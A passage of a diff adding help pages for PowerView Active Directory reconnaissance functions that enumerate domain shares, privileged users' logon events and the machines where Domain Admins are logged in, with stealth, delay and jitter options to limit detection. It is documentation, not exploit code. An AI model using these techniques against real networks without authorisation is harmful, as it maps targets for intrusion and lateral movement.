+Switch.
+Search for users users with '(adminCount=1)' (meaning are/were privileged).
+
+```yaml
+Type: SwitchParameter
+Parameter Sets: TargetUser
+Aliases: AdminCount
+
+Required: False
+Position: Named
+Default value: False
+Accept pipeline input: False
+Accept wildcard characters: False
+```
+
+### -Server
+Specifies an Active Directory server (domain controller) to bind to.
+
+```yaml
+Type: String
+Parameter Sets: (All)
+Aliases: DomainController
+
+Required: False
+Position: Named
+Default value: None
+Accept pipeline input: False
+Accept wildcard characters: False
+```
+
+### -SearchScope
+Specifies the scope to search under for computers, Base/OneLevel/Subtree (default of Subtree).
+
+```yaml
+Type: String
+Parameter Sets: (All)
+Aliases:
+
+Required: False
+Position: Named
+Default value: Subtree
+Accept pipeline input: False
+Accept wildcard characters: False
+```
+
+### -ResultPageSize
+Specifies the PageSize to set for the LDAP searcher object.
+
+```yaml
+Type: Int32
+Parameter Sets: (All)
+Aliases:
+
+Required: False
+Position: Named
+Default value: 200
+Accept pipeline input: False
+Accept wildcard characters: False
+```
+
+### -ServerTimeLimit
+Specifies the maximum amount of time the server spends searching.
+Default of 120 seconds.
+
+```yaml
+Type: Int32
+Parameter Sets: (All)
+Aliases:
+
+Required: False
+Position: Named
+Default value: 0
+Accept pipeline input: False
+Accept wildcard characters: False
+```
+
+### -Tombstone
+Switch.
+Specifies that the searcher should also return deleted/tombstoned objects.
+
+```yaml
+Type: SwitchParameter
+Parameter Sets: (All)
+Aliases:
+
+Required: False
+Position: Named
+Default value: False
+Accept pipeline input: False
+Accept wildcard characters: False
+```
+
+### -Credential
+A \[Management.Automation.PSCredential\] object of alternate credentials
+for connection to the target domain and target systems.
+
+```yaml
+Type: PSCredential
+Parameter Sets: (All)
+Aliases:
+
+Required: False
+Position: Named
+Default value: [Management.Automation.PSCredential]::Empty
+Accept pipeline input: False
+Accept wildcard characters: False
+```
+
+### -StopOnSuccess
+Switch.
+Stop hunting after finding after finding a target user.
+
+```yaml
+Type: SwitchParameter
+Parameter Sets: (All)
+Aliases:
+
+Required: False
+Position: Named
+Default value: False
+Accept pipeline input: False
+Accept wildcard characters: False
+```
+
+### -Delay
+Specifies the delay (in seconds) between enumerating hosts, defaults to 0.
+
+```yaml
+Type: Int32
+Parameter Sets: (All)
+Aliases:
+
+Required: False
+Position: Named
+Default value: 0
+Accept pipeline input: False
+Accept wildcard characters: False
+```
+
+### -Jitter
+Specifies the jitter (0-1.0) to apply to any specified -Delay, defaults to +/- 0.3
+
+```yaml
+Type: Double
+Parameter Sets: (All)
+Aliases:
+
+Required: False
+Position: Named
+Default value: 0.3
+Accept pipeline input: False
+Accept wildcard characters: False
+```
+
+### -Threads
+The number of threads to use for user searching, defaults to 20.
+
+```yaml
+Type: Int32
+Parameter Sets: (All)
+Aliases:
+
+Required: False
+Position: Named
+Default value: 20
+Accept pipeline input: False
+Accept wildcard characters: False
+```
+
+## INPUTS
+
+## OUTPUTS
+
+### PowerView.UserProcess
+
+## NOTES
+
+## RELATED LINKS
+
diff --git a/docs/Recon/Find-DomainShare.md b/docs/Recon/Find-DomainShare.md new file mode 100755 index 0000000..71274b7 --- /dev/null +++ b/docs/Recon/Find-DomainShare.md @@ -0,0 +1,335 @@ +# Find-DomainShare
+
+## SYNOPSIS
+Searches for computer shares on the domain.
+If -CheckShareAccess is passed,
+then only shares the current user has read access to are returned.
+
+Author: Will Schroeder (@harmj0y)
+License: BSD 3-Clause
+Required Dependencies: Get-DomainComputer, Invoke-UserImpersonation, Invoke-RevertToSelf, Get-NetShare, New-ThreadedFunction
+
+## SYNTAX
+
+```
+Find-DomainShare [[-ComputerName] <String[]>] [-ComputerDomain <String>] [-ComputerLDAPFilter <String>]
+ [-ComputerSearchBase <String>] [-ComputerOperatingSystem <String>] [-ComputerServicePack <String>]
+ [-ComputerSiteName <String>] [-CheckShareAccess] [-Server <String>] [-SearchScope <String>]
+ [-ResultPageSize <Int32>] [-ServerTimeLimit <Int32>] [-Tombstone] [-Credential <PSCredential>]
+ [-Delay <Int32>] [-Jitter <Double>] [-Threads <Int32>]
+```
+
+## DESCRIPTION
+This function enumerates all machines on the current (or specified) domain
+using Get-DomainComputer, and enumerates the available shares for each
+machine with Get-NetShare.
+If -CheckShareAccess is passed, then
+\[IO.Directory\]::GetFiles() is used to check if the current user has read
+access to the given share.
+If -Credential is passed, then
+Invoke-UserImpersonation is used to impersonate the specified user before
+enumeration, reverting after with Invoke-RevertToSelf.
+
+## EXAMPLES
+
+### -------------------------- EXAMPLE 1 --------------------------
+```
+Find-DomainShare
+```
+
+Find all domain shares in the current domain.
+
+### -------------------------- EXAMPLE 2 --------------------------
+```
+Find-DomainShare -CheckShareAccess
+```
+
+Find all domain shares in the current domain that the current user has
+read access to.
+
+### -------------------------- EXAMPLE 3 --------------------------
+```
+$SecPassword = ConvertTo-SecureString 'Password123!' -AsPlainText -Force
+```
+
+$Cred = New-Object System.Management.Automation.PSCredential('TESTLAB\dfm.a', $SecPassword)
+Find-DomainShare -Domain testlab.local -Credential $Cred
+
+Searches for domain shares in the testlab.local domain using the specified alternate credentials.
+
+## PARAMETERS
+
+### -ComputerName
+Specifies an array of one or more hosts to enumerate, passable on the pipeline.
+If -ComputerName is not passed, the default behavior is to enumerate all machines
+in the domain returned by Get-DomainComputer.
+
+```yaml
+Type: String[]
+Parameter Sets: (All)
+Aliases: DNSHostName
+
+Required: False
+Position: 1
+Default value: None
+Accept pipeline input: True (ByPropertyName, ByValue)
+Accept wildcard characters: False
+```
+
+### -ComputerDomain
+Specifies the domain to query for computers, defaults to the current domain.
+
+```yaml
+Type: String
+Parameter Sets: (All)
+Aliases: Domain
+
+Required: False
+Position: Named
+Default value: None
+Accept pipeline input: False
+Accept wildcard characters: False
+```
+
+### -ComputerLDAPFilter
+Specifies an LDAP query string that is used to search for computer objects.
+
+```yaml
+Type: String
+Parameter Sets: (All)
+Aliases:
+
+Required: False
+Position: Named
+Default value: None
+Accept pipeline input: False
+Accept wildcard characters: False
+```
+
+### -ComputerSearchBase
+Specifies the LDAP source to search through for computers,
+e.g.
+"LDAP://OU=secret,DC=testlab,DC=local".
+Useful for OU queries.
+
+```yaml
+Type: String
+Parameter Sets: (All)
+Aliases:
+
+Required: False
+Position: Named
+Default value: None
+Accept pipeline input: False
+Accept wildcard characters: False
+```
+
+### -ComputerOperatingSystem
+Search computers with a specific operating system, wildcards accepted.
+
+```yaml
+Type: String
+Parameter Sets: (All)
+Aliases: OperatingSystem
+
+Required: False
+Position: Named
+Default value: None
+Accept pipeline input: False
+Accept wildcard characters: False
+```
+
+### -ComputerServicePack
+Search computers with a specific service pack, wildcards accepted.
+
+```yaml
+Type: String
+Parameter Sets: (All)
+Aliases: ServicePack
+
+Required: False
+Position: Named
+Default value: None
+Accept pipeline input: False
+Accept wildcard characters: False
+```
+
+### -ComputerSiteName
+Search computers in the specific AD Site name, wildcards accepted.
+
+```yaml
+Type: String
+Parameter Sets: (All)
+Aliases: SiteName
+
+Required: False
+Position: Named
+Default value: None
+Accept pipeline input: False
+Accept wildcard characters: False
+```
+
+### -CheckShareAccess
+Switch.
+Only display found shares that the local user has access to.
+
+```yaml
+Type: SwitchParameter
+Parameter Sets: (All)
+Aliases: CheckAccess
+
+Required: False
+Position: Named
+Default value: False
+Accept pipeline input: False
+Accept wildcard characters: False
+```
+
+### -Server
+Specifies an Active Directory server (domain controller) to bind to.
+
+```yaml
+Type: String
+Parameter Sets: (All)
+Aliases: DomainController
+
+Required: False
+Position: Named
+Default value: None
+Accept pipeline input: False
+Accept wildcard characters: False
+```
+
+### -SearchScope
+Specifies the scope to search under for computers, Base/OneLevel/Subtree (default of Subtree).
+
+```yaml
+Type: String
+Parameter Sets: (All)
+Aliases:
+
+Required: False
+Position: Named
+Default value: Subtree
+Accept pipeline input: False
+Accept wildcard characters: False
+```
+
+### -ResultPageSize
+Specifies the PageSize to set for the LDAP searcher object.
+
+```yaml
+Type: Int32
+Parameter Sets: (All)
+Aliases:
+
+Required: False
+Position: Named
+Default value: 200
+Accept pipeline input: False
+Accept wildcard characters: False
+```
+
+### -ServerTimeLimit
+Specifies the maximum amount of time the server spends searching.
+Default of 120 seconds.
+
+```yaml
+Type: Int32
+Parameter Sets: (All)
+Aliases:
+
+Required: False
+Position: Named
+Default value: 0
+Accept pipeline input: False
+Accept wildcard characters: False
+```
+
+### -Tombstone
+Switch.
+Specifies that the searcher should also return deleted/tombstoned objects.
+
+```yaml
+Type: SwitchParameter
+Parameter Sets: (All)
+Aliases:
+
+Required: False
+Position: Named
+Default value: False
+Accept pipeline input: False
+Accept wildcard characters: False
+```
+
+### -Credential
+A \[Management.Automation.PSCredential\] object of alternate credentials
+for connection to the target domain and target systems.
+
+```yaml
+Type: PSCredential
+Parameter Sets: (All)
+Aliases:
+
+Required: False
+Position: Named
+Default value: [Management.Automation.PSCredential]::Empty
+Accept pipeline input: False
+Accept wildcard characters: False
+```
+
+### -Delay
+Specifies the delay (in seconds) between enumerating hosts, defaults to 0.
+
+```yaml
+Type: Int32
+Parameter Sets: (All)
+Aliases:
+
+Required: False
+Position: Named
+Default value: 0
+Accept pipeline input: False
+Accept wildcard characters: False
+```
+
+### -Jitter
+Specifies the jitter (0-1.0) to apply to any specified -Delay, defaults to +/- 0.3
+
+```yaml
+Type: Double
+Parameter Sets: (All)
+Aliases:
+
+Required: False
+Position: Named
+Default value: 0.3
+Accept pipeline input: False
+Accept wildcard characters: False
+```
+
+### -Threads
+The number of threads to use for user searching, defaults to 20.
+
+```yaml
+Type: Int32
+Parameter Sets: (All)
+Aliases:
+
+Required: False
+Position: Named
+Default value: 20
+Accept pipeline input: False
+Accept wildcard characters: False
+```
+
+## INPUTS
+
+## OUTPUTS
+
+### PowerView.ShareInfo
+
+## NOTES
+
+## RELATED LINKS
+
diff --git a/docs/Recon/Find-DomainUserEvent.md b/docs/Recon/Find-DomainUserEvent.md new file mode 100755 index 0000000..12e64a9 --- /dev/null +++ b/docs/Recon/Find-DomainUserEvent.md @@ -0,0 +1,451 @@ +# Find-DomainUserEvent
+
+## SYNOPSIS
+Finds logon events on the current (or remote domain) for the specified users.
+
+Author: Lee Christensen (@tifkin_), Justin Warner (@sixdub), Will Schroeder (@harmj0y)
+License: BSD 3-Clause
+Required Dependencies: Get-DomainUser, Get-DomainGroupMember, Get-DomainController, Get-DomainUserEvent, New-ThreadedFunction
+
+## SYNTAX
+
+### Domain (Default)
+```
+Find-DomainUserEvent [-Domain <String>] [-Filter <Hashtable>] [-StartTime <DateTime>] [-EndTime <DateTime>]
+ [-MaxEvents <Int32>] [-UserIdentity <String[]>] [-UserDomain <String>] [-UserLDAPFilter <String>]
+ [-UserSearchBase <String>] [-UserGroupIdentity <String[]>] [-UserAdminCount] [-CheckAccess] [-Server <String>]
+ [-SearchScope <String>] [-ResultPageSize <Int32>] [-ServerTimeLimit <Int32>] [-Tombstone]
+ [-Credential <PSCredential>] [-StopOnSuccess] [-Delay <Int32>] [-Jitter <Double>] [-Threads <Int32>]
+```
+
+### ComputerName
+```
+Find-DomainUserEvent [[-ComputerName] <String[]>] [-Filter <Hashtable>] [-StartTime <DateTime>]
+ [-EndTime <DateTime>] [-MaxEvents <Int32>] [-UserIdentity <String[]>] [-UserDomain <String>]
+ [-UserLDAPFilter <String>] [-UserSearchBase <String>] [-UserGroupIdentity <String[]>] [-UserAdminCount]
+ [-CheckAccess] [-Server <String>] [-SearchScope <String>] [-ResultPageSize <Int32>] [-ServerTimeLimit <Int32>]
+ [-Tombstone] [-Credential <PSCredential>] [-StopOnSuccess] [-Delay <Int32>] [-Jitter <Double>]
+ [-Threads <Int32>]
+```
+
+## DESCRIPTION
+Enumerates all domain controllers from the specified -Domain
+(default of the local domain) using Get-DomainController, enumerates
+the logon events for each using Get-DomainUserEvent, and filters
+the results based on the targeting criteria.
+
+## EXAMPLES
+
+### -------------------------- EXAMPLE 1 --------------------------
+```
+Find-DomainUserEvent
+```
+
+Search for any user events matching domain admins on every DC in the current domain.
+
+### -------------------------- EXAMPLE 2 --------------------------
+```
+$cred = Get-Credential dev\administrator
+```
+
+Find-DomainUserEvent -ComputerName 'secondary.dev.testlab.local' -UserIdentity 'john'
+
+Search for any user events matching the user 'john' on the 'secondary.dev.testlab.local'
+domain controller using the alternate credential
+
+### -------------------------- EXAMPLE 3 --------------------------
+```
+'primary.testlab.local | Find-DomainUserEvent -Filter @{'IpAddress'='192.168.52.200|192.168.52.201'}
+```
+
+Find user events on the primary.testlab.local system where the event matches
+the IPAddress '192.168.52.200' or '192.168.52.201'.
+
+### -------------------------- EXAMPLE 4 --------------------------
+```
+$cred = Get-Credential testlab\administrator
+```
+
+Find-DomainUserEvent -Delay 1 -Filter @{'LogonGuid'='b8458aa9-b36e-eaa1-96e0-4551000fdb19'; 'TargetLogonId' = '10238128'; 'op'='&'}
+
+Find user events mathing the specified GUID AND the specified TargetLogonId, searching
+through every domain controller in the current domain, enumerating each DC in serial
+instead of in a threaded manner, using the alternate credential.
+
+## PARAMETERS
+
+### -ComputerName
+Specifies an explicit computer name to retrieve events from.
+
+```yaml
+Type: String[]
+Parameter Sets: ComputerName
+Aliases: dnshostname, HostName, name
+
+Required: False
+Position: 1
+Default value: None
+Accept pipeline input: True (ByPropertyName, ByValue)
+Accept wildcard characters: False
+```
+
+### -Domain
+Specifies a domain to query for domain controllers to enumerate.
+Defaults to the current domain.
+
+```yaml
+Type: String
+Parameter Sets: Domain
+Aliases:
+
+Required: False
+Position: Named
+Default value: None
+Accept pipeline input: False
+Accept wildcard characters: False
+```
+
+### -Filter
+A hashtable of PowerView.LogonEvent properties to filter for.
+The 'op|operator|operation' clause can have '&', '|', 'and', or 'or',
+and is 'or' by default, meaning at least one clause matches instead of all.
+See the exaples for usage.
+
+```yaml
+Type: Hashtable
+Parameter Sets: (All)
+Aliases:
+
+Required: False
+Position: Named
+Default value: None
+Accept pipeline input: False
+Accept wildcard characters: False
+```
+
+### -StartTime
+The \[DateTime\] object representing the start of when to collect events.
+Default of \[DateTime\]::Now.AddDays(-1).
+
+```yaml
+Type: DateTime
+Parameter Sets: (All)
+Aliases:
+
+Required: False
+Position: Named
+Default value: [DateTime]::Now.AddDays(-1)
+Accept pipeline input: True (ByPropertyName)
+Accept wildcard characters: False
+```
+
+### -EndTime
+The \[DateTime\] object representing the end of when to collect events.
+Default of \[DateTime\]::Now.
+
+```yaml
+Type: DateTime
+Parameter Sets: (All)
+Aliases:
+
+Required: False
+Position: Named
+Default value: [DateTime]::Now
+Accept pipeline input: True (ByPropertyName)
+Accept wildcard characters: False
+```
+
+### -MaxEvents
+The maximum number of events (per host) to retrieve.
+Default of 5000.
+
+```yaml
+Type: Int32
+Parameter Sets: (All)
+Aliases:
+
+Required: False
+Position: Named
+Default value: 5000
+Accept pipeline input: False
+Accept wildcard characters: False
+```
+
+### -UserIdentity
+Specifies one or more user identities to search for.
+
+```yaml
+Type: String[]
+Parameter Sets: (All)
+Aliases:
+
+Required: False
+Position: Named
+Default value: None
+Accept pipeline input: False
+Accept wildcard characters: False
+```
+
+### -UserDomain
+Specifies the domain to query for users to search for, defaults to the current domain.
+
+```yaml
+Type: String
+Parameter Sets: (All)
+Aliases:
+
+Required: False
+Position: Named
+Default value: None
+Accept pipeline input: False
+Accept wildcard characters: False
+```
+
+### -UserLDAPFilter
+Specifies an LDAP query string that is used to search for target users.
+
+```yaml
+Type: String
+Parameter Sets: (All)
+Aliases:
+
+Required: False
+Position: Named
+Default value: None
+Accept pipeline input: False
+Accept wildcard characters: False
+```
+
+### -UserSearchBase
+Specifies the LDAP source to search through for target users.
+e.g.
+"LDAP://OU=secret,DC=testlab,DC=local".
+Useful for OU queries.
+
+```yaml
+Type: String
+Parameter Sets: (All)
+Aliases:
+
+Required: False
+Position: Named
+Default value: None
+Accept pipeline input: False
+Accept wildcard characters: False
+```
+
+### -UserGroupIdentity
+Specifies a group identity to query for target users, defaults to 'Domain Admins.
+If any other user specifications are set, then UserGroupIdentity is ignored.
+
+```yaml
+Type: String[]
+Parameter Sets: (All)
+Aliases: GroupName, Group
+
+Required: False
+Position: Named
+Default value: Domain Admins
+Accept pipeline input: False
+Accept wildcard characters: False
+```
+
+### -UserAdminCount
+Switch.
+Search for users users with '(adminCount=1)' (meaning are/were privileged).
+
+```yaml
+Type: SwitchParameter
+Parameter Sets: (All)
+Aliases: AdminCount
+
+Required: False
+Position: Named
+Default value: False
+Accept pipeline input: False
+Accept wildcard characters: False
+```
+
+### -CheckAccess
+{{Fill CheckAccess Description}}
+
+```yaml
+Type: SwitchParameter
+Parameter Sets: (All)
+Aliases:
+
+Required: False
+Position: Named
+Default value: False
+Accept pipeline input: False
+Accept wildcard characters: False
+```
+
+### -Server
+Specifies an Active Directory server (domain controller) to bind to.
+
+```yaml
+Type: String
+Parameter Sets: (All)
+Aliases: DomainController
+
+Required: False
+Position: Named
+Default value: None
+Accept pipeline input: False
+Accept wildcard characters: False
+```
+
+### -SearchScope
+Specifies the scope to search under for computers, Base/OneLevel/Subtree (default of Subtree).
+
+```yaml
+Type: String
+Parameter Sets: (All)
+Aliases:
+
+Required: False
+Position: Named
+Default value: Subtree
+Accept pipeline input: False
+Accept wildcard characters: False
+```
+
+### -ResultPageSize
+Specifies the PageSize to set for the LDAP searcher object.
+
+```yaml
+Type: Int32
+Parameter Sets: (All)
+Aliases:
+
+Required: False
+Position: Named
+Default value: 200
+Accept pipeline input: False
+Accept wildcard characters: False
+```
+
+### -ServerTimeLimit
+Specifies the maximum amount of time the server spends searching.
+Default of 120 seconds.
+
+```yaml
+Type: Int32
+Parameter Sets: (All)
+Aliases:
+
+Required: False
+Position: Named
+Default value: 0
+Accept pipeline input: False
+Accept wildcard characters: False
+```
+
+### -Tombstone
+Switch.
+Specifies that the searcher should also return deleted/tombstoned objects.
+
+```yaml
+Type: SwitchParameter
+Parameter Sets: (All)
+Aliases:
+
+Required: False
+Position: Named
+Default value: False
+Accept pipeline input: False
+Accept wildcard characters: False
+```
+
+### -Credential
+A \[Management.Automation.PSCredential\] object of alternate credentials
+for connection to the target computer(s).
+
+```yaml
+Type: PSCredential
+Parameter Sets: (All)
+Aliases:
+
+Required: False
+Position: Named
+Default value: [Management.Automation.PSCredential]::Empty
+Accept pipeline input: False
+Accept wildcard characters: False
+```
+
+### -StopOnSuccess
+Switch.
+Stop hunting after finding after finding a target user.
+
+```yaml
+Type: SwitchParameter
+Parameter Sets: (All)
+Aliases:
+
+Required: False
+Position: Named
+Default value: False
+Accept pipeline input: False
+Accept wildcard characters: False
+```
+
+### -Delay
+Specifies the delay (in seconds) between enumerating hosts, defaults to 0.
+
+```yaml
+Type: Int32
+Parameter Sets: (All)
+Aliases:
+
+Required: False
+Position: Named
+Default value: 0
+Accept pipeline input: False
+Accept wildcard characters: False
+```
+
+### -Jitter
+Specifies the jitter (0-1.0) to apply to any specified -Delay, defaults to +/- 0.3
+
+```yaml
+Type: Double
+Parameter Sets: (All)
+Aliases:
+
+Required: False
+Position: Named
+Default value: 0.3
+Accept pipeline input: False
+Accept wildcard characters: False
+```
+
+### -Threads
+The number of threads to use for user searching, defaults to 20.
+
+```yaml
+Type: Int32
+Parameter Sets: (All)
+Aliases:
+
+Required: False
+Position: Named
+Default value: 20
+Accept pipeline input: False
+Accept wildcard characters: False
+```
+
+## INPUTS
+
+## OUTPUTS
+
+### PowerView.LogonEvent
+
+PowerView.ExplicitCredentialLogon
+
+## NOTES
+
+## RELATED LINKS
+
+[http://www.sixdub.net/2014/11/07/offensive-event-parsing-bringing-home-trophies/](http://www.sixdub.net/2014/11/07/offensive-event-parsing-bringing-home-trophies/)
+
diff --git a/docs/Recon/Find-DomainUserLocation.md b/docs/Recon/Find-DomainUserLocation.md new file mode 100755 index 0000000..0d200aa --- /dev/null +++ b/docs/Recon/Find-DomainUserLocation.md @@ -0,0 +1,579 @@ +# Find-DomainUserLocation
+
+## SYNOPSIS
+Finds domain machines where specific users are logged into.
+
+Author: Will Schroeder (@harmj0y)
+License: BSD 3-Clause
+Required Dependencies: Get-DomainFileServer, Get-DomainDFSShare, Get-DomainController, Get-DomainComputer, Get-DomainUser, Get-DomainGroupMember, Invoke-UserImpersonation, Invoke-RevertToSelf, Get-NetSession, Test-AdminAccess, Get-NetLoggedon, Resolve-IPAddress, New-ThreadedFunction
+
+## SYNTAX
+
+### UserGroupIdentity (Default)
+```
+Find-DomainUserLocation [[-ComputerName] <String[]>] [-Domain <String>] [-ComputerDomain <String>]
+ [-ComputerLDAPFilter <String>] [-ComputerSearchBase <String>] [-ComputerUnconstrained]
+ [-ComputerOperatingSystem <String>] [-ComputerServicePack <String>] [-ComputerSiteName <String>]
+ [-UserDomain <String>] [-UserLDAPFilter <String>] [-UserSearchBase <String>] [-UserGroupIdentity <String[]>]
+ [-UserAdminCount] [-UserAllowDelegation] [-CheckAccess] [-Server <String>] [-SearchScope <String>]
+ [-ResultPageSize <Int32>] [-ServerTimeLimit <Int32>] [-Tombstone] [-Credential <PSCredential>]
+ [-StopOnSuccess] [-Delay <Int32>] [-Jitter <Double>] [-Stealth] [-StealthSource <String>] [-Threads <Int32>]
+```
+
+### UserIdentity
+```
+Find-DomainUserLocation [[-ComputerName] <String[]>] [-Domain <String>] [-ComputerDomain <String>]
+ [-ComputerLDAPFilter <String>] [-ComputerSearchBase <String>] [-ComputerUnconstrained]
+ [-ComputerOperatingSystem <String>] [-ComputerServicePack <String>] [-ComputerSiteName <String>]
+ [-UserIdentity <String[]>] [-UserDomain <String>] [-UserLDAPFilter <String>] [-UserSearchBase <String>]
+ [-UserAdminCount] [-UserAllowDelegation] [-CheckAccess] [-Server <String>] [-SearchScope <String>]
+ [-ResultPageSize <Int32>] [-ServerTimeLimit <Int32>] [-Tombstone] [-Credential <PSCredential>]
+ [-StopOnSuccess] [-Delay <Int32>] [-Jitter <Double>] [-Stealth] [-StealthSource <String>] [-Threads <Int32>]
+```
+
+### ShowAll
+```
+Find-DomainUserLocation [[-ComputerName] <String[]>] [-Domain <String>] [-ComputerDomain <String>]
+ [-ComputerLDAPFilter <String>] [-ComputerSearchBase <String>] [-ComputerUnconstrained]
+ [-ComputerOperatingSystem <String>] [-ComputerServicePack <String>] [-ComputerSiteName <String>]
+ [-UserDomain <String>] [-UserLDAPFilter <String>] [-UserSearchBase <String>] [-UserAdminCount]
+ [-UserAllowDelegation] [-CheckAccess] [-Server <String>] [-SearchScope <String>] [-ResultPageSize <Int32>]
+ [-ServerTimeLimit <Int32>] [-Tombstone] [-Credential <PSCredential>] [-StopOnSuccess] [-Delay <Int32>]
+ [-Jitter <Double>] [-ShowAll] [-Stealth] [-StealthSource <String>] [-Threads <Int32>]
+```
+
+## DESCRIPTION
+This function enumerates all machines on the current (or specified) domain
+using Get-DomainComputer, and queries the domain for users of a specified group
+(default 'Domain Admins') with Get-DomainGroupMember.
+Then for each server the
+function enumerates any active user sessions with Get-NetSession/Get-NetLoggedon
+The found user list is compared against the target list, and any matches are
+displayed.
+If -ShowAll is specified, all results are displayed instead of
+the filtered set.
+If -Stealth is specified, then likely highly-trafficed servers
+are enumerated with Get-DomainFileServer/Get-DomainController, and session
+enumeration is executed only against those servers.
+If -Credential is passed,
+then Invoke-UserImpersonation is used to impersonate the specified user
+before enumeration, reverting after with Invoke-RevertToSelf.
+
+## EXAMPLES
+
+### -------------------------- EXAMPLE 1 --------------------------
+```
+Find-DomainUserLocation
+```
+
+Searches for 'Domain Admins' by enumerating every computer in the domain.
+
+### -------------------------- EXAMPLE 2 --------------------------
+```
+Find-DomainUserLocation -Stealth -ShowAll
+```
+
+Enumerates likely highly-trafficked servers, performs just session enumeration
+against each, and outputs all results.
+
+### -------------------------- EXAMPLE 3 --------------------------
+```
+Find-DomainUserLocation -UserAdminCount -ComputerOperatingSystem 'Windows 7*' -Domain dev.testlab.local
+```
+
+Enumerates Windows 7 computers in dev.testlab.local and returns user results for privileged
+users in dev.testlab.local.
+
+### -------------------------- EXAMPLE 4 --------------------------
+```
+$SecPassword = ConvertTo-SecureString 'Password123!' -AsPlainText -Force
+```
+
+$Cred = New-Object System.Management.Automation.PSCredential('TESTLAB\dfm.a', $SecPassword)
+Find-DomainUserLocation -Domain testlab.local -Credential $Cred
+
+Searches for domain admin locations in the testlab.local using the specified alternate credentials.
+
+## PARAMETERS
+
+### -ComputerName
+Specifies an array of one or more hosts to enumerate, passable on the pipeline.
+If -ComputerName is not passed, the default behavior is to enumerate all machines
+in the domain returned by Get-DomainComputer.
+
+```yaml
+Type: String[]
+Parameter Sets: (All)
+Aliases: DNSHostName
+
+Required: False
+Position: 1
+Default value: None
+Accept pipeline input: True (ByPropertyName, ByValue)
+Accept wildcard characters: False
+```
+
+### -Domain
+Specifies the domain to query for computers AND users, defaults to the current domain.
+
+```yaml
+Type: String
+Parameter Sets: (All)
+Aliases:
+
+Required: False
+Position: Named
+Default value: None
+Accept pipeline input: False
+Accept wildcard characters: False
+```
+
+### -ComputerDomain
+Specifies the domain to query for computers, defaults to the current domain.
+
+```yaml
+Type: String
+Parameter Sets: (All)
+Aliases:
+
+Required: False
+Position: Named
+Default value: None
+Accept pipeline input: False
+Accept wildcard characters: False
+```
+
+### -ComputerLDAPFilter
+Specifies an LDAP query string that is used to search for computer objects.
+
+```yaml
+Type: String
+Parameter Sets: (All)
+Aliases:
+
+Required: False
+Position: Named
+Default value: None
+Accept pipeline input: False
+Accept wildcard characters: False
+```
+
+### -ComputerSearchBase
+Specifies the LDAP source to search through for computers,
+e.g.
+"LDAP://OU=secret,DC=testlab,DC=local".
+Useful for OU queries.
+
+```yaml
+Type: String
+Parameter Sets: (All)
+Aliases:
+
+Required: False
+Position: Named
+Default value: None
+Accept pipeline input: False
+Accept wildcard characters: False
+```
+
+### -ComputerUnconstrained
+Switch.
+Search computer objects that have unconstrained delegation.
+
+```yaml
+Type: SwitchParameter
+Parameter Sets: (All)
+Aliases: Unconstrained
+
+Required: False
+Position: Named
+Default value: False
+Accept pipeline input: False
+Accept wildcard characters: False
+```
+
+### -ComputerOperatingSystem
+Search computers with a specific operating system, wildcards accepted.
+
+```yaml
+Type: String
+Parameter Sets: (All)
+Aliases: OperatingSystem
+
+Required: False
+Position: Named
+Default value: None
+Accept pipeline input: False
+Accept wildcard characters: False
+```
+
+### -ComputerServicePack
+Search computers with a specific service pack, wildcards accepted.
+
+```yaml
+Type: String
+Parameter Sets: (All)
+Aliases: ServicePack
+
+Required: False
+Position: Named
+Default value: None
+Accept pipeline input: False
+Accept wildcard characters: False
+```
+
+### -ComputerSiteName
+Search computers in the specific AD Site name, wildcards accepted.
+
+```yaml
+Type: String
+Parameter Sets: (All)
+Aliases: SiteName
+
+Required: False
+Position: Named
+Default value: None
+Accept pipeline input: False
+Accept wildcard characters: False
+```
+
+### -UserIdentity
+Specifies one or more user identities to search for.
+
+```yaml
+Type: String[]
+Parameter Sets: UserIdentity
+Aliases:
+
+Required: False
+Position: Named
+Default value: None
+Accept pipeline input: False
+Accept wildcard characters: False
+```
+
+### -UserDomain
+Specifies the domain to query for users to search for, defaults to the current domain.
+
+```yaml
+Type: String
+Parameter Sets: (All)
+Aliases:
+
+Required: False
+Position: Named
+Default value: None
+Accept pipeline input: False
+Accept wildcard characters: False
+```
+
+### -UserLDAPFilter
+Specifies an LDAP query string that is used to search for target users.
+
+```yaml
+Type: String
+Parameter Sets: (All)
+Aliases:
+
+Required: False
+Position: Named
+Default value: None
+Accept pipeline input: False
+Accept wildcard characters: False
+```
+
+### -UserSearchBase
+Specifies the LDAP source to search through for target users.
+e.g.
+"LDAP://OU=secret,DC=testlab,DC=local".
+Useful for OU queries.
+
+```yaml
+Type: String
+Parameter Sets: (All)
+Aliases:
+
+Required: False
+Position: Named
+Default value: None
+Accept pipeline input: False
+Accept wildcard characters: False
+```
+
+### -UserGroupIdentity
+Specifies a group identity to query for target users, defaults to 'Domain Admins.
+If any other user specifications are set, then UserGroupIdentity is ignored.
+
+```yaml
+Type: String[]
+Parameter Sets: UserGroupIdentity
+Aliases: GroupName, Group
+
+Required: False
+Position: Named
+Default value: Domain Admins
+Accept pipeline input: False
+Accept wildcard characters: False
+```
+
+### -UserAdminCount
+Switch.
+Search for users users with '(adminCount=1)' (meaning are/were privileged).
+
+```yaml
+Type: SwitchParameter
+Parameter Sets: (All)
+Aliases: AdminCount
+
+Required: False
+Position: Named
+Default value: False
+Accept pipeline input: False
+Accept wildcard characters: False
+```
+
+### -UserAllowDelegation
+Switch.
+Search for user accounts that are not marked as 'sensitive and not allowed for delegation'.
+
+```yaml
+Type: SwitchParameter
+Parameter Sets: (All)
+Aliases: AllowDelegation
+
+Required: False
+Position: Named
+Default value: False
+Accept pipeline input: False
+Accept wildcard characters: False
+```
+
+### -CheckAccess
+Switch.
+Check if the current user has local admin access to computers where target users are found.
+
+```yaml
+Type: SwitchParameter
+Parameter Sets: (All)
+Aliases:
+
+Required: False
+Position: Named
+Default value: False
+Accept pipeline input: False
+Accept wildcard characters: False
+```
+
+### -Server
+Specifies an Active Directory server (domain controller) to bind to.
+
+```yaml
+Type: String
+Parameter Sets: (All)
+Aliases: DomainController
+
+Required: False
+Position: Named
+Default value: None
+Accept pipeline input: False
+Accept wildcard characters: False
+```
+
+### -SearchScope
+Specifies the scope to search under for computers, Base/OneLevel/Subtree (default of Subtree).
+
+```yaml
+Type: String
+Parameter Sets: (All)
+Aliases:
+
+Required: False
+Position: Named
+Default value: Subtree
+Accept pipeline input: False
+Accept wildcard characters: False
+```
+
+### -ResultPageSize
+Specifies the PageSize to set for the LDAP searcher object.
+
+```yaml
+Type: Int32
+Parameter Sets: (All)
+Aliases:
+
+Required: False
+Position: Named
+Default value: 200
+Accept pipeline input: False
+Accept wildcard characters: False
+```
+
